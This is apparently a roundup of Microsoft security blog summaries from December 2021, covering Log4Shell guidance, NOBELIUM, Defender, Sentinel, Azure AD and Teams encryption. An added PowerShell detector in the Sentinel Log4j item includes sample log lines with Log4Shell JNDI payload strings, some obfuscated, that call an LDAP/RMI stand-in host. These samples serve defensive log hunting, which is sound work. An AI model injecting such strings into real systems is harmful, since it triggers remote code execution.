Microsoft Security Saturday – 12/18/2021

Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation
Microsoft’s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), the Microsoft 365 Defender Threat Intelligence Team, RiskIQ and the Microsoft Detection and Response Team (DART), among others, has been tracking threats that exploit CVE-2021-44228, a remote code execution (RCE) vulnerability in Apache Log4j 2 known as “Log4Shell”.

The final report on NOBELIUM’s unprecedented nation-state attack
This is the final post in a four-part series on the NOBELIUM nation-state cyberattack. In December 2020, Microsoft began sharing details with the world about what became known as the most sophisticated nation-state cyberattack in history. Microsoft’s four-part video series “Decoding NOBELIUM” pulls the curtain back on the NOBELIUM incident and on how world-class threat hunters from Microsoft and across the industry came together to take it on. In this last post, we reflect on the lessons learned covered in the fourth episode of the docuseries.

Block USB in Microsoft Defender for Endpoint and Intune
A common request from information security teams is the ability to block mass storage devices. As every defender knows, you cannot draw a hard line and block EVERY USB mass storage device: exceptions will always come up. In this blog article, I’ll show you how to configure blocking of mass storage devices with an allow list that you can maintain in Intune and Microsoft Defender for Endpoint.

Defender for Office – Attack Simulation end user email notifications are now customizable!
Attack Simulation Training is an intelligent phish-risk reduction tool that measures behavior change and automates the deployment of an integrated security awareness training program across an organization. It is available with Microsoft 365 E5 or the Microsoft Defender for Office 365 P2 plan. In a phishing simulation, admins can use end user email notifications to inform targeted users about their participation in the campaign or to thank them for a successful phishing report.

M365 Defender CloudAppEvents in advanced hunting now includes non-Microsoft apps and new data columns
We are pleased to share that we have expanded coverage of the CloudAppEvents table in advanced hunting to include non-Microsoft cloud app activities monitored by Microsoft Defender for Cloud Apps. In addition, we have added new columns to the CloudAppEvents table, such as IsExternalUser and IsImpersonated. Together, these enhancements help you hunt for threats in cloud app activity using advanced hunting in Microsoft 365 Defender.

How Defender for Cloud displays machines affected by Log4j vulnerabilities
In situations like this, organizations that use Microsoft Defender for Cloud can begin investigating immediately, even before a CVE number has been assigned, by querying the installed software on their machines with the Inventory tools.

Forward On-Premises Windows Security Event Logs to Microsoft Sentinel
There is no need to load an agent on every device to capture the Windows Security event logs from your on-premises Windows workstations and servers; Windows hosts already have the capability built into the operating system. To collect the events without installing the Azure Monitor Agent (AMA) everywhere, Windows Event Forwarding (WEF) can send the logs to a Windows Event Collector (WEC). Only the WEC then needs the AMA installed, to ship the forwarded events to a Log Analytics workspace (LAW) monitored by Microsoft Sentinel.

What’s New: Detecting Apache Log4j vulnerabilities with Microsoft Sentinel
Microsoft’s security research teams have been tracking threats taking advantage of the remote code execution (RCE) vulnerability in Apache Log4j 2 referred to as “Log4Shell” and tracked as CVE-2021-44228. The vulnerability allows unauthenticated remote code execution and is triggered when a specially crafted string, supplied by the attacker through any of a variety of input vectors, is parsed and processed by the vulnerable Log4j 2 component.
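A way to hunt for that crafted string in logs you already hold, as an added example that is not code from the Sentinel post: a check that URL-decodes a line, collapses the nested-lookup and default-value obfuscations that were used to hide the literal lookup keyword, and only then matches the published `${jndi:...}` lookup syntax of CVE-2021-44228. The access-log lines and the 203.0.113.x addresses are constructed for the example; the obfuscation patterns handled are assumed to be the common ones and not an exhaustive list.

```powershell
# Added example (not from the original post). Detects Log4j JNDI lookup strings
# in text log lines after undoing common obfuscations. Patterns follow the
# published CVE-2021-44228 lookup syntax; sample lines below are constructed.
function Test-Log4ShellIndicator {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$Line)

    $s = $Line
    # Undo URL encoding (payloads often arrive as %24%7Bjndi...); a second pass
    # catches double-encoding and is harmless on already-decoded text.
    $s = [uri]::UnescapeDataString([uri]::UnescapeDataString($s))

    # Collapse nested lookups used to hide "jndi":
    #   ${lower:j} / ${upper:j}                 -> j
    #   ${::-j} / ${env:NOPE:-j} / ${sys:x:-j}  -> j   (default-value syntax)
    # Loop because the tricks nest, e.g. ${${lower:${lower:j}}ndi:...}.
    for ($i = 0; $i -lt 10; $i++) {
        $before = $s
        $s = [regex]::Replace($s, '\$\{(?:lower|upper):([^{}]*)\}', '$1', 'IgnoreCase')
        $s = [regex]::Replace($s, '\$\{[^{}]*:-([^{}]*)\}', '$1')
        if ($s -eq $before) { break }
    }

    # After normalization a payload reduces to ${jndi:<scheme>:...}; match the
    # lookup itself rather than a scheme list (ldap, ldaps, rmi, dns, iiop, ...).
    return [bool]($s -match '(?i)\$\{\s*jndi\s*:')
}

# Constructed sample lines in common access-log format; the last two are benign.
$samples = @(
    '10.0.0.5 - - [12/Dec/2021:10:15:01 +0000] "GET /login?user=${jndi:ldap://203.0.113.10:1389/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"'
    '10.0.0.6 - - [12/Dec/2021:10:15:07 +0000] "GET / HTTP/1.1" 200 1024 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/x}"'
    '10.0.0.7 - - [12/Dec/2021:10:15:09 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F203.0.113.10%2Fo%7D HTTP/1.1" 404 0 "-" "curl/7.79"'
    '10.0.0.8 - - [12/Dec/2021:10:15:12 +0000] "GET /api/items?price=${10} HTTP/1.1" 200 77 "-" "Mozilla/5.0"'
    '10.0.0.9 - - [12/Dec/2021:10:15:15 +0000] "POST /search HTTP/1.1" 200 300 "-" "Mozilla/5.0 (X11; Linux x86_64)"'
)

foreach ($line in $samples) {
    $label = if (Test-Log4ShellIndicator -Line $line) { 'SUSPECT' } else { 'ok     ' }
    '{0}  {1}' -f $label, $line.Substring(0, [Math]::Min(90, $line.Length))
}
```

The first three lines are flagged and the last two are not. Because the check runs on the decoded and normalized string, it also catches the lookup when it is hidden in a header such as User-Agent rather than the URL, which matters since the post stresses that the string can arrive through many input vectors; a match is an indicator of an attempt, not proof of a vulnerable host, so pair it with the vulnerability data the Sentinel content provides.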

Microsoft Sentinel – SAP continuous threat monitoring workbooks
In May 2021, Microsoft announced new threat monitoring protection for SAP systems in Microsoft Sentinel. Since then, we have continuously expanded the out-of-the-box, predefined content: once you deploy the solution in your Microsoft Sentinel workspace, 50 different analytics rules, watchlists and workbooks are added. In this blog we go over the features supported by our new workbooks.

Microsoft Sentinel Jupyter Notebooks knowledge check test
Microsoft Sentinel uses a common API to extend the SIEM’s native capabilities with external tools such as Jupyter notebooks and Python. Jupyter extends the scope of what you can do with data in Microsoft Sentinel: it combines full programmability with a large collection of libraries for machine learning, visualization and data analysis to enhance investigations and threat hunting.

Simplify your identity provisioning with these new Azure AD capabilities
With the continued evolution and adoption of hybrid work, we know how critical a strong identity and governance control plane is for IT scalability and a seamless user experience. Today, we are excited to share new Azure Active Directory (Azure AD) capabilities and best practices that help organizations with these needs. With these updates, organizations can allow password writeback from the cloud when using Azure AD Connect cloud sync, provision to on-premises applications, verify their SCIM provisioning endpoints, and more.

Intrinsic infrastructure security for the hybrid world
We are excited to announce the release of a new version of the Dell EMC OpenManage extension for Windows Admin Center that includes key new security-themed features. The OpenManage extension brings intrinsic security management, streamlined for Azure Stack HCI and Windows Server. Complementing Windows Admin Center’s native Security tool, the Dell EMC OpenManage extension helps IT administrators configure Secured-core server end to end, starting at the BIOS level.

Govern your Snowflake data with Azure Purview
Azure Purview, as a unified data governance service, keeps expanding support for data sources across on-premises, multi-cloud and SaaS applications. It helps you generate a holistic, up-to-date map of your data landscape with automated data discovery. Now you can bring over metadata from Snowflake by scanning your Snowflake databases, then manage and govern your Snowflake data in Azure Purview.

End-to-end encryption for one-to-one Microsoft Teams calls now Generally Available
In October, we announced the public preview of end-to-end encryption (E2EE) support for Microsoft Teams calls. Today, we are happy to announce that E2EE for one-to-one Teams calls is now generally available. IT admins will have the option to enable and control the feature for their organization once the update has been received.

Modernize security with Microsoft Edge and IE mode
Are you ensuring your organization is secured with a modern web browser? On June 15, 2022, the Internet Explorer 11 (“IE11”) desktop application will retire and go out of support for certain versions of Windows 10. With the rise of phishing attacks, and with users spending 60% of their time on a PC in the browser, the browser is an important vector to consider in your organization’s Zero Trust strategy.